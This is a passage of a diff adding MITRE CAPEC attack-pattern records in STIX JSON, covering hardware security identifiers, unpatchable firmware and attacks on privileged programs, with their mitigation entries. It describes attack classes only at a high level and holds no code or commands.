"course-of-action--6b798e4e-c828-4581-abb6-6e17c7dd80c8", + "target_ref": "attack-pattern--1abd165a-57e9-4b78-9221-7b6fcdc57810", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2021-10-21T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Test security lock programming flow in both pre-silicon and post-silicon environments.", + "id": "course-of-action--46b5084e-a2c7-462c-8aac-2a3e6e32e12c", + "modified": "2021-10-21T00:00:00.000Z", + "name": "coa-680-2", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2021-10-21T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--3ce0cc33-be72-46dc-91f1-c7e2891fb760", + "modified": "2021-10-21T00:00:00.000Z", + "object_marking_refs": [ + 
"marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--46b5084e-a2c7-462c-8aac-2a3e6e32e12c", + "target_ref": "attack-pattern--1abd165a-57e9-4b78-9221-7b6fcdc57810", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2021-10-21T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Leverage automated tools to test that values are not reprogrammable and that write-once fields lock on writing zeros.", + "id": "course-of-action--b579fa05-4d4e-46a5-8146-7c81316da234", + "modified": "2021-10-21T00:00:00.000Z", + "name": "coa-680-3", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2021-10-21T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--739ffd20-3728-428b-b493-fba7c95d706c", + "modified": "2021-10-21T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--b579fa05-4d4e-46a5-8146-7c81316da234", + "target_ref": "attack-pattern--1abd165a-57e9-4b78-9221-7b6fcdc57810", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2021-10-21T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Ensure that measurement data is stored in registers that are read-only or otherwise have access controls that prevent modification by an untrusted agent.", + "id": "course-of-action--ba08dc27-44eb-4fa4-b5f2-dfbfa85987e5", + "modified": "2021-10-21T00:00:00.000Z", + "name": "coa-680-4", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": 
"2021-10-21T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--5af32ae4-547c-4e74-97a3-7ac9778fccd7", + "modified": "2021-10-21T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--ba08dc27-44eb-4fa4-b5f2-dfbfa85987e5", + "target_ref": "attack-pattern--1abd165a-57e9-4b78-9221-7b6fcdc57810", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2021-10-21T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "\n An adversary takes advantage of missing or incorrectly configured security identifiers (e.g., tokens), which are used for access control within a System-on-Chip (SoC), to read/write data or execute a given action.\n ", + "external_references": [ + { + "external_id": "CAPEC-681", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/681.html" + }, + { + "external_id": "CWE-1259", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/1259.html" + }, + { + "external_id": "CWE-1267", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/1267.html" + }, + { + "external_id": "CWE-1270", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/1270.html" + }, + { + "external_id": "CWE-1294", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/1294.html" + }, + { + "external_id": "CWE-1302", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/1302.html" + }, + { + "description": "PCIe Device Measurement Requirements, 2018--09, Intel Corporation", + "external_id": "REF-694", + "source_name": "reference_from_CAPEC", + "url": "https://www.intel.com/content/dam/www/public/us/en/documents/reference-guides/pcie-device-security-enhancements.pdf" + }, + { + "description": "John Butterworth, Cory Kallenberg, 
Xeno Kovah, BIOS Chronomancy: Fixing the Core Root of Trust for Measurement, 2013--07---31", + "external_id": "REF-695", + "source_name": "reference_from_CAPEC", + "url": "https://media.blackhat.com/us-13/US-13-Butterworth-BIOS-Security-Slides.pdf" + } + ], + "id": "attack-pattern--e8a8a8f5-3ad5-4d3f-a35b-48036147266b", + "modified": "2021-10-21T00:00:00.000Z", + "name": "Exploitation of Improperly Controlled Hardware Security Identifiers", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "attack-pattern", + "x_capec_abstraction": "Detailed", + "x_capec_child_of_refs": [ + "attack-pattern--92cdcd3d-d734-4442-afc3-4599f261498b", + "attack-pattern--aac17300-6cdd-4f50-82c3-da5a01d225ac" + ], + "x_capec_consequences": { + "Access_Control": [ + "Gain Privileges" + ], + "Authorization": [ + "Gain Privileges" + ], + "Confidentiality": [ + "Read Data", + "Gain Privileges" + ], + "Integrity": [ + "Modify Data" + ] + }, + "x_capec_domains": [ + "Hardware", + "Hardware" + ], + "x_capec_example_instances": [ + "\n A system contains a register (divided into four 32-bit registers) that is used to store a 128-bit AES key for encryption/decryption, in addition to an access-policy register. The access-policy register determines which agents may access the AES-key registers, based on a corresponding security identifier. It is assumed the system has two agents: a Main-controller and an Aux-controller, with respective security identifiers \"1\" and \"2\". The Main-controller (ID \"1\") is meant to have access to the AES-key registers, while the Aux-controller (ID \"2\") has access to the access-policy register. If a SoC incorrectly generates security identifier \"1\" for both agents, then both agents will have access to the AES-key registers. 
This could further result in a Denial-of-Service (DoS) or the execution of an action that in turn could result in privilege escalation or unintended access.\n " + ], + "x_capec_extended_description": "\n A System-on-Chip (SoC) often implements a security identifier mechanism to differentiate what actions are allowed or disallowed when a transaction originates from an entity. However, these mechanisms may be exploitable due to any number of the following:\n \n The security identifiers are missing\n The security identifiers are incorrectly implemented or generated\n The security identifiers are generated with an obsolete encoding\n The security identifiers are generated and implemented correctly, but are improperly protected\n \n If the security identifiers leveraged by the SoC are missing or misconfigured, an adversary may be able to take advantage of this shortcoming to circumvent the intended access controls. This could result in the adversary gaining unintended access, performing a Denial of Service (DoS), escalating privileges, or spoofing actions from a trusted agent.\n ", + "x_capec_likelihood_of_attack": "Medium", + "x_capec_prerequisites": [ + "Awareness of the hardware being leveraged.", + "Access to the hardware being leveraged." + ], + "x_capec_skills_required": { + "High": "Intricate knowledge of the identifiers being utilized.", + "Medium": "Ability to execute actions within the SoC." 
+ }, + "x_capec_status": "Draft", + "x_capec_typical_severity": "Very High", + "x_capec_version": "3.9" + }, + { + "created": "2021-10-21T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Review generation of security identifiers for design inconsistencies and common weaknesses.", + "id": "course-of-action--01ab67eb-d3f3-4853-bda1-c1ca06afc898", + "modified": "2021-10-21T00:00:00.000Z", + "name": "coa-681-0", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2021-10-21T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--d0df491b-0667-4d31-9aa1-9a9f21ccbc1c", + "modified": "2021-10-21T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--01ab67eb-d3f3-4853-bda1-c1ca06afc898", + "target_ref": "attack-pattern--e8a8a8f5-3ad5-4d3f-a35b-48036147266b", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2021-10-21T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Review security identifier decoders for design inconsistencies and common weaknesses.", + "id": "course-of-action--2290178c-f33c-4fb0-9b25-c553c2499dae", + "modified": "2021-10-21T00:00:00.000Z", + "name": "coa-681-1", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2021-10-21T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--38e2a6ae-74e9-48d2-8118-bf5c8494a56c", + "modified": "2021-10-21T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + 
"relationship_type": "mitigates", + "source_ref": "course-of-action--2290178c-f33c-4fb0-9b25-c553c2499dae", + "target_ref": "attack-pattern--e8a8a8f5-3ad5-4d3f-a35b-48036147266b", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2021-10-21T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Test security identifier definition, access, and programming flow in both pre-silicon and post-silicon environments.", + "id": "course-of-action--cb529162-8335-438c-9301-27477c72f990", + "modified": "2021-10-21T00:00:00.000Z", + "name": "coa-681-2", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2021-10-21T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--c1cc36ea-b168-4d92-b480-8c003969dc5a", + "modified": "2021-10-21T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--cb529162-8335-438c-9301-27477c72f990", + "target_ref": "attack-pattern--e8a8a8f5-3ad5-4d3f-a35b-48036147266b", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2022-09-29T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "An adversary may exploit vulnerable code (i.e., firmware or ROM) that is unpatchable. Unpatchable devices exist due to manufacturers intentionally or inadvertently designing devices incapable of updating their software. 
Additionally, with updatable devices, the manufacturer may decide not to support the device and stop making updates to their software.", + "external_references": [ + { + "external_id": "CAPEC-682", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/682.html" + }, + { + "external_id": "CWE-1277", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/1277.html" + }, + { + "external_id": "CWE-1310", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/1310.html" + }, + { + "description": "Alex Scroxton, Alarm bells ring, the IoT is listening, 2019--12---13, TechTarget", + "external_id": "REF-723", + "source_name": "reference_from_CAPEC", + "url": "https://www.computerweekly.com/news/252475324/Alarm-bells-ring-the-IoT-is-listening" + }, + { + "description": "Matthew Hughes, Bad news: KeyWe Smart Lock is easily bypassed and can't be fixed, 2019--12---11, Situation Publishing", + "external_id": "REF-724", + "source_name": "reference_from_CAPEC", + "url": "https://www.theregister.com/2019/12/11/f_secure_keywe/" + }, + { + "description": "Brian Krebs, Zyxel Flaw Powers New Mirai IoT Botnet Strain, 2020--03---20, Krebs on Security", + "external_id": "REF-725", + "source_name": "reference_from_CAPEC", + "url": "https://krebsonsecurity.com/2020/03/zxyel-flaw-powers-new-mirai-iot-botnet-strain/" + }, + { + "description": "Colin Schulz, Stefan Raff, Sebastian Kortmann, Nikolaus Obwegeser, Digital Age Organizations: Uncovering Over-the-Air Updates in the Smart Product Realm, 2021--12, International Conference on Information Systems (ICIS) 2021", + "external_id": "REF-726", + "source_name": "reference_from_CAPEC", + "url": "https://www.researchgate.net/publication/356065917_Digital_Age_Organizations_Uncovering_Over-the-Air_Updates_in_the_Smart_Product_Realm" + } + ], + "id": "attack-pattern--01a08342-5c58-4f61-b8e1-997e444b3a59", + "modified": "2022-09-29T00:00:00.000Z", + "name": "Exploitation of Firmware or ROM Code 
with Unpatchable Vulnerabilities", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "attack-pattern", + "x_capec_abstraction": "Standard", + "x_capec_child_of_refs": [ + "attack-pattern--c727c058-2c9d-4021-a1ec-81dd030dea59" + ], + "x_capec_consequences": { + "Access_Control": [ + "Gain Privileges" + ], + "Authorization": [ + "Gain Privileges" + ], + "Confidentiality": [ + "Read Data" + ], + "Integrity": [ + "Modify Data" + ] + }, + "x_capec_domains": [ + "Software", + "Hardware" + ], + "x_capec_example_instances": [ + "\n An IoT company comes out with a line of smart products for home use such as home cameras, vacuums, and smart bulbs. The products become popular, and millions of consumers install these devices in their homes. All the devices use a custom module for encryption that is stored on a ROM chip, which is immutable memory and can't be changed. An adversary discovers that there is a vulnerability in the encryption module code that allows authentication bypass, gaining access to any device. The adversary then develops botnet code that is remotely downloaded onto the infected devices. This code scans the internet for nearby devices from the same product line and exploits the vulnerability, loading the botnet code onto these new devices. Over time, the adversary now has a botnet of devices that can carry out malicious activity such as a DDoS attacks. Once the vulnerability is found, it is impossible to remediate because the vulnerable code is unable to be updated.\n ", + "\n Older smartphones can become out of date and manufacturers may stop putting out security updates as they focus on newer models. If an adversary discovers a vulnerability in an old smartphone there is a chance that a security update will not be made to mitigate it. This leaves anyone using the old smartphone vulnerable.\n " + ], + "x_capec_execution_flow": "

Execution Flow

Explore

  1. Determine vulnerable firmware or ROM code: An adversary will attempt to find device models that are known to have unpatchable firmware or ROM code, or are deemed “end-of-support” where a patch will not be made. The adversary looks for vulnerabilities in firmware or ROM code for the identified devices, or looks for devices which have known vulnerabilities

  2. Techniques
    Many botnets use wireless scanning to discover nearby devices that might have default credentials or commonly used passwords. Once these devices are infected, they can search for other nearby devices and so on.

Experiment

  1. Determine plan of attack: An adversary identifies a specific device/model that they wish to attack. They will also investigate similar devices to determine if the vulnerable firmware or ROM code is also present.

Exploit

  1. Carry out attack: An adversary exploits the vulnerable firmware or ROM code on the identified device(s) to achieve their desired goal.

  2. Techniques
    Install malware on a device to recruit it for a botnet.
    Install malware on the device and use it for a ransomware attack.
    Gain root access and steal information stored on the device.
    Manipulate the device to behave in unexpected ways which would benefit the adversary.
", + "x_capec_extended_description": "When a vulnerability is found in a device that has no means of patching, the attack may be used against an entire class of devices. Devices from the same manufacturer often use similar or identical firmware, which could lead to widespread attacks. Devices of this nature are prime targets for botnet attacks. Consumer devices are frequently targeted for this attack due to the complexities of updating firmware once manufacturers no longer have physical access to a device. When exploiting a found vulnerability, adversaries often try to gain root access on a device. This allows them to use the device for any malicious purpose. Some example exploits are stealing device data, using the device for a ransomware attack, or recruiting the device for a botnet.", + "x_capec_likelihood_of_attack": "Medium", + "x_capec_prerequisites": [ + "Awareness of the hardware being leveraged.", + "Access to the hardware being leveraged, either physically or remotely." + ], + "x_capec_skills_required": { + "High": "Ability to identify physical entry points such as debug interfaces if the device is not being accessed remotely", + "Medium": "Knowledge of various wireless protocols to enable remote access to vulnerable devices" + }, + "x_capec_status": "Draft", + "x_capec_typical_severity": "High", + "x_capec_version": "3.9" + }, + { + "created": "2022-09-29T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Design systems and products with the ability to patch firmware or ROM code after deployment to fix vulnerabilities.", + "id": "course-of-action--50d2cb62-2305-4a24-b41a-b873229ef2b9", + "modified": "2022-09-29T00:00:00.000Z", + "name": "coa-682-0", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2022-09-29T00:00:00.000Z", + "created_by_ref": 
"identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--674abd8b-cd24-4a54-a5d6-ec62714bbb25", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--50d2cb62-2305-4a24-b41a-b873229ef2b9", + "target_ref": "attack-pattern--01a08342-5c58-4f61-b8e1-997e444b3a59", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2022-09-29T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Make use of OTA (Over-the-air) updates so that firmware can be patched remotely either through manual or automatic means", + "id": "course-of-action--feb21138-cc49-427c-a020-0515522bd9d7", + "modified": "2022-09-29T00:00:00.000Z", + "name": "coa-682-1", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2022-09-29T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--9984f250-94f7-4b92-83be-65978b06954e", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--feb21138-cc49-427c-a020-0515522bd9d7", + "target_ref": "attack-pattern--01a08342-5c58-4f61-b8e1-997e444b3a59", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "This attack targets programs running with elevated privileges. 
The adversary tries to leverage a vulnerability in the running program and get arbitrary code to execute with elevated privileges.", + "external_references": [ + { + "external_id": "CAPEC-69", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/69.html" + }, + { + "external_id": "CWE-250", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/250.html" + }, + { + "external_id": "CWE-15", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/15.html" + }, + { + "description": "G. Hoglund, G. McGraw, Exploiting Software: How to Break Code, 2004--02, Addison-Wesley", + "external_id": "REF-1", + "source_name": "reference_from_CAPEC" + } + ], + "id": "attack-pattern--ca989a50-b24e-4917-a234-ce4788fa21c7", + "modified": "2021-10-21T00:00:00.000Z", + "name": "Target Programs with Elevated Privileges", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "attack-pattern", + "x_capec_abstraction": "Standard", + "x_capec_can_precede_refs": [ + "attack-pattern--e62000f0-addd-4156-b9fd-469bbb211d45", + "attack-pattern--b6a2983b-1d97-4698-b210-961ed0523f33", + "attack-pattern--4a29d66d-8617-4382-b456-578ecdb1609e", + "attack-pattern--4cd18074-15c1-4206-8391-115685669623" + ], + "x_capec_child_of_refs": [ + "attack-pattern--c05fff04-b965-4a11-9c18-379dac31969f" + ], + "x_capec_consequences": { + "Access_Control": [ + "Gain Privileges" + ], + "Authorization": [ + "Gain Privileges" + ], + "Availability": [ + "Execute Unauthorized Commands (Run Arbitrary Code)", + "Resource Consumption (Denial of Service)" + ], + "Confidentiality": [ + "Execute Unauthorized Commands (Run Arbitrary Code)", + "Gain Privileges" + ], + "Integrity": [ + "Execute Unauthorized Commands (Run Arbitrary Code)" + ] + }, + "x_capec_domains": [ + "Software" + ], + "x_capec_execution_flow": "

Execution Flow

Explore

  1. Find programs with elevated priveleges: The adversary probes for programs running with elevated privileges.

  2. Techniques
    Look for programs that write to the system directories or registry keys (such as HKLM, which stores a number of critical Windows environment variables). These programs are typically running with elevated privileges and have usually not been designed with security in mind. Such programs are excellent exploit targets because they yield lots of power when they break.
  3. Find vulnerability in running program: The adversary looks for a vulnerability in the running program that would allow for arbitrary code execution with the privilege of the running program.

  4. Techniques
    Look for improper input validation
    Look for improper failure safety. For instance when a program fails it may authorize restricted access to anyone.
    Look for a buffer overflow which may be exploited if an adversary can inject unvalidated data.

Exploit

  1. Execute arbitrary code: The adversary exploits the vulnerability that they have found. For instance, they can try to inject and execute arbitrary code or write to OS resources.

", + "x_capec_likelihood_of_attack": "High", + "x_capec_prerequisites": [ + "The targeted program runs with elevated OS privileges.", + "The targeted program accepts input data from the user or from another program.", + "The targeted program is giving away information about itself. Before performing such attack, an eventual attacker may need to gather information about the services running on the host target. The more the host target is verbose about the services that are running (version number of application, etc.) the more information can be gather by an attacker.", + "This attack often requires communicating with the host target services directly. For instance Telnet may be enough to communicate with the host target." + ], + "x_capec_skills_required": { + "Low": "An attacker can use a tool to scan and automatically launch an attack against known issues. A tool can also repeat a sequence of instructions and try to brute force the service on the host target, an example of that would be the flooding technique.", + "Medium": "More advanced attack may require knowledge of the protocol spoken by the host service." 
+ }, + "x_capec_status": "Draft", + "x_capec_typical_severity": "Very High", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Apply the principle of least privilege.", + "id": "course-of-action--c87108ec-86d6-4db1-b9a6-9d165534dfbb", + "modified": "2021-10-21T00:00:00.000Z", + "name": "coa-69-0", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--4ac5e039-5b39-4762-baa6-db1436c0c113", + "modified": "2021-10-21T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--c87108ec-86d6-4db1-b9a6-9d165534dfbb", + "target_ref": "attack-pattern--ca989a50-b24e-4917-a234-ce4788fa21c7", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Validate all untrusted data.", + "id": "course-of-action--ffbb9cca-91d0-42f4-8214-bd2ef9539388", + "modified": "2021-10-21T00:00:00.000Z", + "name": "coa-69-1", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--3b71f57d-057f-4ba8-90a3-b82441f7ad5f", + "modified": "2021-10-21T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--ffbb9cca-91d0-42f4-8214-bd2ef9539388", + 
"target_ref": "attack-pattern--ca989a50-b24e-4917-a234-ce4788fa21c7", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Apply the latest patches.", + "id": "course-of-action--82e53757-6195-45a8-87d8-b8a3471be28d", + "modified": "2021-10-21T00:00:00.000Z", + "name": "coa-69-2", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--3c3677a7-f6ef-4f6a-98f2-23a940c9d065", + "modified": "2021-10-21T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--82e53757-6195-45a8-87d8-b8a3471be28d", + "target_ref": "attack-pattern--ca989a50-b24e-4917-a234-ce4788fa21c7", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Scan your services and disable the ones which are not needed and are exposed unnecessarily. Exposing programs increases the attack surface. 
Only expose the services which are needed and have security mechanisms such as authentication built around them.", + "id": "course-of-action--7b2b2f5e-63ea-4e66-b1db-20c8cfb846bc", + "modified": "2021-10-21T00:00:00.000Z", + "name": "coa-69-3", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--3852cd85-fee0-458c-aa19-1ee065916045", + "modified": "2021-10-21T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--7b2b2f5e-63ea-4e66-b1db-20c8cfb846bc", + "target_ref": "attack-pattern--ca989a50-b24e-4917-a234-ce4788fa21c7", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Avoid revealing information about your system (e.g., version of the program) to anonymous users.", + "id": "course-of-action--2e81b94f-576a-4a5d-8535-19447cf00938", + "modified": "2021-10-21T00:00:00.000Z", + "name": "coa-69-4", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--6f38ce3b-57b6-40fc-8b8c-08befcded00e", + "modified": "2021-10-21T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--2e81b94f-576a-4a5d-8535-19447cf00938", + "target_ref": "attack-pattern--ca989a50-b24e-4917-a234-ce4788fa21c7", + "type": "relationship", + 
"x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Make sure that your program or service fail safely. What happen if the communication protocol is interrupted suddenly? What happen if a parameter is missing? Does your system have resistance and resilience to attack? Fail safely when a resource exhaustion occurs.", + "id": "course-of-action--c88ccddb-e8a1-4fd2-91df-be5dfb7cd1b3", + "modified": "2021-10-21T00:00:00.000Z", + "name": "coa-69-5", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--5b4e5f04-ebe0-4a77-b851-5826990a4dda", + "modified": "2021-10-21T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--c88ccddb-e8a1-4fd2-91df-be5dfb7cd1b3", + "target_ref": "attack-pattern--ca989a50-b24e-4917-a234-ce4788fa21c7", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "If possible use a sandbox model which limits the actions that programs can take. 
A sandbox restricts a program to a set of privileges and commands that make it difficult or impossible for the program to cause any damage.", + "id": "course-of-action--7031e154-89f3-4994-8c96-386138825551", + "modified": "2021-10-21T00:00:00.000Z", + "name": "coa-69-6", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--f29e28aa-4464-4272-a547-4585c2e99452", + "modified": "2021-10-21T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--7031e154-89f3-4994-8c96-386138825551", + "target_ref": "attack-pattern--ca989a50-b24e-4917-a234-ce4788fa21c7", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Check your program for buffer overflow and format String vulnerabilities which can lead 